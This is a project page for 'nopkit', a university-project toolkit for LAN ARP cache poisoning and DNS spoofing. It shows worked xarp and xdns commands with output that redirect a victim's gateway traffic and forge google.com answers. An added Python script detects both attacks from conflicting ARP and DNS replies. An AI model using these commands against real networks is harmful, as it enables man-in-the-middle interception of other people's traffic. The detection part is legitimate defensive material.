[nopkit] - The Network Operator's Toolkit
Author
Jesse Pool <pool[at]eecg[dot]toronto[dot]edu>
Description
nopkit is a tool suite that can be used for monitoring
and manipulating the local network. It provides basic tools like an ARP
poisoner and a DNS spoofer to shape traffic redirection. In order to find
machines on the LAN, a tool has been included that will quickly print out
the IP and MAC addresses of all visible network nodes. New tools are currently
being written, including a browser mirror.
Most of the features you'll find here have been ported to Windows, however, much of the testing and coding was done under Linux. The libpcap and libnet libraries provide packet capture and injection portability.
Motivation
This toolkit was part of my 4th Year Engineering Project
at Carleton University in Ottawa, Canada. Our goal was to demonstrate a
man-in-the-middle attack on an SSH2 console session. You can see more details
at the project website
or read about it in our submitted
report.
I'm now finishing up my undergrad degree and this was a fun and informative
project to take on.
Usage
Each tool has been written with the intent of being very general. My hope is that
each tool is useful on its own. The downside to this is that you need
to know what you're doing to get the best use out of nopkit. Here are a few examples
with output.
Here's an example ARP poison. The intent with this command is to poison the ARP cache of 192.168.2.100. We want to receive all of its traffic destined to the local gateway (192.168.2.1). The defaults take care of most of the work.
# ./xarp -a 192.168.2.1 -v -v -e -i eth2 192.168.2.100
[nopkit] - Welcome to xarp...
Discovering (192.168.2.100)...
Device: eth2
Addresses:
  Target IP  = 192.168.2.100
  Target MAC = 00:04:e2:94:5a:2c
  Source IP  = 192.168.2.1
  Source MAC = 00:02:3d:5b:be:f9
Config:
  Local MAC    = 00:02:3d:5b:be:f9
  Enable ICMP  = No
  Packet Delay = 1000000
  Packet Count = INFINITE
  Verbose      = 2
Sending poison...
  1. 192.168.2.1 is at 00:02:3d:5b:be:f9 -> 192.168.2.100
  2. 192.168.2.1 is at 00:02:3d:5b:be:f9 -> 192.168.2.100
  3. 192.168.2.1 is at 00:02:3d:5b:be:f9 -> 192.168.2.100
  4. 192.168.2.1 is at 00:02:3d:5b:be:f9 -> 192.168.2.100
  5. 192.168.2.1 is at 00:02:3d:5b:be:f9 -> 192.168.2.100
Received termination signal. Graceful exit...
Packet Stats:
  ARP Packets Sent = 5
  Packet Errors    = 0
  Bytes Written    = 210

The next example is a DNS spoof. We want any DNS requests made for google.com to be directed to 192.168.2.101, some web server on the LAN. The options are pretty simple: just specify the domain name and the IP address you want to put in the answer.
# ./xdns -d *google.com -a 192.168.2.101 -v -v -i eth2
[nopkit] - Welcome to xdns...
Device: eth2
Domain Name Service:
  Name    = *google.com
  Address = 192.168.2.101
Config:
  Local MAC    = 00:02:3d:5b:be:f9
  Filter       = udp and dst port 53
  Time to Live = 150 seconds
  Verbose      = 2
Listening for DNS Query...
  1. Query: Source=192.168.2.100 Domain=www.yahoo.com ID=463
  2. Query: Source=192.168.2.100 Domain=us.a1.yimg.com ID=464
  3. Query: Source=192.168.2.100 Domain=us.i1.yimg.com ID=465
  4. Query: Source=192.168.2.100 Domain=ads.osdn.com ID=466
  5. Query: Source=192.168.2.100 Domain=images.slashdot.org ID=467
  6. Query: Source=192.168.2.100 Domain=view.atdmt.com ID=468
  7. Query: Source=192.168.2.100 Domain=images-aud.slashdot.org ID=469
  8. Query: Source=192.168.2.100 Domain=spe.atdmt.com ID=470
  9. Query: Source=192.168.2.100 Domain=gmail.google.com ID=471
     --> Reply Sent: gmail.google.com=192.168.2.101
  10. Query: Source=192.168.2.100 Domain=www.google.com ID=472
     --> Reply Sent: www.google.com=192.168.2.101
  11. Query: Source=192.168.2.100 Domain=microsoft.com ID=473
  12. Query: Source=192.168.2.100 Domain=www.microsoft.com ID=474
  13. Query: Source=192.168.2.100 Domain=rad.microsoft.com ID=475
  14. Query: Source=192.168.2.100 Domain=c.microsoft.com ID=476
  15. Query: Source=192.168.2.100 Domain=c1.microsoft.com ID=477
  16. Query: Source=192.168.2.100 Domain=global.msads.net ID=478
Received termination signal. Graceful exit...

These are just two simple examples. The other tools are similarly structured and equally general. You can find more information on using each tool in the readme. Also, use -h for a full list of options.
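From the other side of the wire, both sessions above leave a signature a network operator can watch for: the gateway's IP suddenly claiming the poisoner's MAC, and a second, disagreeing answer to a DNS query once the real resolver also replies. The following passive check is an added example, not part of nopkit; its ARP replies and DNS answers are constructed from the output above, and the real gateway MAC and real resolver addresses are hypothetical.

```python
# Constructed ARP replies (ip, mac) as decoded from a capture on eth2.
# Entry 0 plays the real gateway (hypothetical MAC); entries 2-3 mirror the
# "192.168.2.1 is at 00:02:3d:5b:be:f9" frames in the xarp output above.
ARP_REPLIES = [
    ("192.168.2.1", "00:0c:29:aa:bb:cc"),
    ("192.168.2.100", "00:04:e2:94:5a:2c"),
    ("192.168.2.1", "00:02:3d:5b:be:f9"),
    ("192.168.2.1", "00:02:3d:5b:be:f9"),
]

# Constructed DNS answers (txn_id, name, ip). Query 472 gets two answers:
# the forged LAN address from the xdns output, then the real resolver's
# (hypothetical, documentation-range address).
DNS_ANSWERS = [
    (471, "gmail.google.com", "192.168.2.101"),
    (472, "www.google.com", "192.168.2.101"),
    (472, "www.google.com", "203.0.113.10"),
    (473, "microsoft.com", "203.0.113.20"),
]


def arp_conflicts(replies, trusted=None):
    """Return (ip, known_mac, claimed_mac) for each reply contradicting the
    recorded binding. Seed `trusted` from a static inventory; otherwise the
    first sighting is the baseline, only safe if capture began before poisoning."""
    table, alerts = dict(trusted or {}), []
    for ip, mac in replies:
        known = table.setdefault(ip, mac)
        if known != mac:
            alerts.append((ip, known, mac))
    return alerts


def dns_conflicts(answers):
    """Return (txn_id, name, first_ip, later_ip) when two answers to the
    same query disagree: the sign that a spoofer raced the real resolver."""
    first, alerts = {}, []
    for txn_id, name, ip in answers:
        key = (txn_id, name)
        if key in first and first[key] != ip:
            alerts.append((txn_id, name, first[key], ip))
        first.setdefault(key, ip)
    return alerts


if __name__ == "__main__":
    for ip, old, new in arp_conflicts(ARP_REPLIES):
        print(f"ARP: {ip} was {old}, now claimed by {new}")
    for txn_id, name, a, b in dns_conflicts(DNS_ANSWERS):
        print(f"DNS: id {txn_id} {name} answered {a}, then {b}")
```

Note that a monitor started after the poisoning began records the forged binding as its baseline and stays silent, which is why the gateway's MAC belongs in a static table rather than learned from traffic.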
Download
You can download everything you need,
including compile instructions, etc. For Windows folks who don't have access
to VS 2003, you can download precompiled binaries
of each tool including a compiled Libnet.dll, but you'll still need to get
WinPcap (I've tested it out with version
3.0). See the readme for more details.
To make things a little easier for Windows developers, you can download the Libnet and WinPcap folders that I've been using. Just download these and extract them to the same directory as nopkit. Then just open the nopkit sln, and compile libnet. Once that's done the nopkit tools *should* compile. Before running, you should copy Libnet.dll to the system32 directory.
Warning
nopkit is not guaranteed in any way. Read the licence
before downloading. This software may break stuff.